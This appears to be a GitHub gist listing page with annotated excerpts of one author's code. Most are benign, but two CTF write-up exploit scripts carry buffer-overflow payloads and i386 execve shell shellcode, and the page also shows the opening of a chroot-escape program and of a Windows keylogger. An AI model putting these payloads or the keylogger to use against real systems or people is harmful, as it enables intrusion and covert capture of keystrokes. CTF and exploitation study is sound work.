
inaz2 / oh_my_scanf.py
Last active August 29, 2015 14:15
Write-up of Advent Calendar CTF 2014 oh_my_scanf (http://adctf2014.katsudon.org/)
# CTF exploit script written against the (Python 2-era) roputils API; the
# payload is assembled as a byte string.
from roputils import *
# Target: the local binary by default; the commented-out line is the remote
# challenge service.
p = Proc('./oh_my_scanf')
#p = Proc(host='pwnable.katsudon.org', port=32100)
# 32-bit x86 shellcode helper.
sc = Shellcode('i386')
# Stack-buffer overflow payload: 28 bytes of padding reach the saved return
# address (the offset comes from the challenge binary; not verifiable here).
buf = 'A' * 28
# Overwrite the return address with a `push esp; ret` gadget: after the
# vulnerable function's `ret` pops this word, esp points at the bytes that
# follow it, so the gadget transfers control straight into the shellcode.
# A fixed 0x0804xxxx text-segment address only works while the binary is
# non-PIE; it is not affected by stack ASLR because the gadget re-derives the
# stack address from esp at runtime.
buf += p32(0x80483e0) # push esp; ret
# The overflow is reached through scanf("%s"), which stops at the first
# whitespace byte, so the shellcode is XOR-encoded (presumably with a decoder
# stub prepended by roputils) so that none of the C isspace() bytes listed
# here appear in the payload.
buf += sc.xor(sc.exec_shell(), '\t\n\v\f\r ') # eliminate white-space characters for scanf("%s") attack
inaz2 / result.txt
Last active August 29, 2015 14:16
a minimal test of uninitialized pointer use (CWE-824: Access of Uninitialized Pointer)
$ uname -a
Linux vm-ubuntu64 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 14.04.1 LTS
Release: 14.04
Codename: trusty
inaz2 / escape.c
Created April 29, 2015 12:09
escape from chroot on Ubuntu 14.04.1
/* http://www.gcd.org/blog/2007/09/132/ */
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
#include <sys/stat.h>
#include <errno.h>
#define BUFMAX 256
int main(int argc, char *argv[]) {
inaz2 / traceroute.py
Last active June 26, 2024 14:19
Python implementation of traceroute
# references:
# Learning by doing: Writing your own traceroute in 8 easy steps (Ksplice Blog)
# https://blogs.oracle.com/ksplice/entry/learning_by_doing_writing_your
import sys
import socket
def traceroute(dest_addr, max_hops=30, timeout=0.2):
proto_icmp = socket.getprotobyname('icmp')
proto_udp = socket.getprotobyname('udp')
inaz2 / keylogger.py
Last active December 21, 2019 16:38
Windows keylogger by Python ctypes (Cygwin)
import sys
import time
from ctypes import *
# user32!GetAsyncKeyState(vKey), bound with no argtypes/restype: ctypes passes
# the int VK code and the SHORT result comes back through the default c_int
# restype, so test the documented bits (high bit = key currently down, low
# bit = pressed since the last call, per the Win32 docs) rather than comparing
# the whole value.  Polling it for every VK code (the loop below) is the
# classic user-mode keylogging technique and is what EDR hooks look for.
GetAsyncKeyState = cdll.user32.GetAsyncKeyState
# Virtual-key codes that have no printable character, mapped to labels
# (VK_BACK, VK_TAB, VK_RETURN, VK_SHIFT, VK_CONTROL, VK_MENU, VK_CAPITAL,
# VK_ESCAPE, VK_SPACE, VK_DELETE).  Other codes are presumably logged via their
# character -- the formatting code is not in this excerpt.
special_keys = {0x08: "BS", 0x09: "Tab", 0x0d: "Enter", 0x10: "Shift", 0x11: "Ctrl", 0x12: "Alt", 0x14: "CapsLock", 0x1b: "Esc", 0x20: "Space", 0x2e: "Del"}
# reset key states
for i in xrange(256):
inaz2 / enumwindows.py
Last active June 16, 2024 11:13
EnumWindows + GetWindowText by Python ctypes (Cygwin)
from ctypes import *
# user32 bindings via cdll (cdecl).  That is correct on 64-bit Windows, which
# has a single calling convention; on 32-bit these APIs are stdcall and would
# need windll / WINFUNCTYPE instead.  The gist targets Cygwin, presumably
# 64-bit -- confirm before reusing.
EnumWindows = cdll.user32.EnumWindows
# Callback prototype for BOOL CALLBACK EnumWindowsProc(HWND, LPARAM).  Both
# arguments are declared as POINTER(c_int): pointer-sized, so they work as
# opaque handles, and the visible part of the callback only passes hwnd
# through to other user32 calls.  c_void_p (or wintypes.HWND / LPARAM) would
# state the intent more honestly.
EnumWindowsProc = CFUNCTYPE(c_bool, POINTER(c_int), POINTER(c_int))
# Wide-char (UTF-16) variants.  Per the Win32 docs GetWindowTextLengthW does
# not count the terminating NUL, so the receiving buffer must be one wchar
# larger -- the allocation is not in this excerpt.
GetWindowText = cdll.user32.GetWindowTextW
GetWindowTextLength = cdll.user32.GetWindowTextLengthW
IsWindowVisible = cdll.user32.IsWindowVisible
def enum_func(hwnd, lParam):
if IsWindowVisible(hwnd):
inaz2 / brainfuck.s
Last active March 15, 2020 14:58
x86 brainfuck interpreter
/* brainfuck.s */
.intel_syntax noprefix
.globl _start
_start:
lea edx, mem
lea esi, bfcode
loop:
mov al, [esi]
inaz2 / exploit.py
Last active August 29, 2015 14:27
セキュリティ・キャンプ2015 出張 CTF for ビギナーズ 川柳 (Pwn 300) write-up / https://github.com/rekkusu/seccamp2015ctf
import struct
import socket
from telnetlib import Telnet
# The three "senryu" lines are 5, 7 and 5 bytes of i386 machine code -- the
# 5-7-5 form the challenge accepts.  Concatenated they form a read() stager;
# this only works if the challenge lays the three lines out back-to-back in
# executable memory (cannot be confirmed from this excerpt).
#   8d 48 19   lea ecx, [eax+0x19]  ; read buffer; eax presumably points at
#                                   ; the poem on entry -- confirm in the binary
#   31 db      xor ebx, ebx         ; fd 0 (stdin)
senryu1 = '\x8d\x48\x19\x31\xdb'
#   6a 7f / 5a push 0x7f ; pop edx  ; count = 127 bytes
#   6a 03 / 58 push 3    ; pop eax  ; eax = 3 = sys_read (i386 ABI)
#   90         nop                  ; pad to 7 bytes
senryu2 = '\x6a\x7f\x5a\x6a\x03\x58\x90'
#   cd 80      int 0x80             ; read(0, ecx, 0x7f)
#   ff e1      jmp ecx              ; execute whatever was just read in
#   90         nop                  ; pad to 5 bytes
senryu3 = '\xcd\x80\xff\xe1\x90'
# execve("/bin/sh", {"/bin/sh", NULL}, NULL)
# Stage 2, presumably sent once the stager's read() is blocking (the sending
# code is not in this excerpt): the classic 23-byte i386 execve("/bin//sh")
# shellcode -- push 0xb; pop eax; cdq; push edx; push "//sh"; push "/bin";
# mov ebx, esp; push edx; push ebx; mov ecx, esp; int 0x80.  Python 2 str
# literal: these are raw bytes, not text.
shellcode = '\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80'
inaz2 / megrepper.html
Last active August 30, 2015 07:31
目grep ("eye-grep": spotting structure in a binary by rendering its bytes as pixels) in the browser (HTML5 Canvas + File API)
<!DOCTYPE html>
<html>
<meta charset="UTF-8">
<title>megrepper</title>
<body>
<canvas id="canvas"></canvas>
<div style="position: fixed; left: 160px; display: inline-block;">
<h1>megrepper</h1>
<pre id="edit" style="width: 40em; margin: 0; background-color: #eeeeee">Drag &amp; drop a file on page</pre>
</div>
inaz2 / highresclock.html
Last active September 3, 2015 07:37
High-resolution clock using requestAnimationFrame()
<!DOCTYPE html>
<html>
<title>High-resolution clock</title>
<h1></h1>
<canvas id="canvas" width="400" height="400"></canvas>
<script>
(function() {
var requestAnimationFrame = window.requestAnimationFrame || window.mozRequestAnimationFrame ||
window.webkitRequestAnimationFrame || window.msRequestAnimationFrame;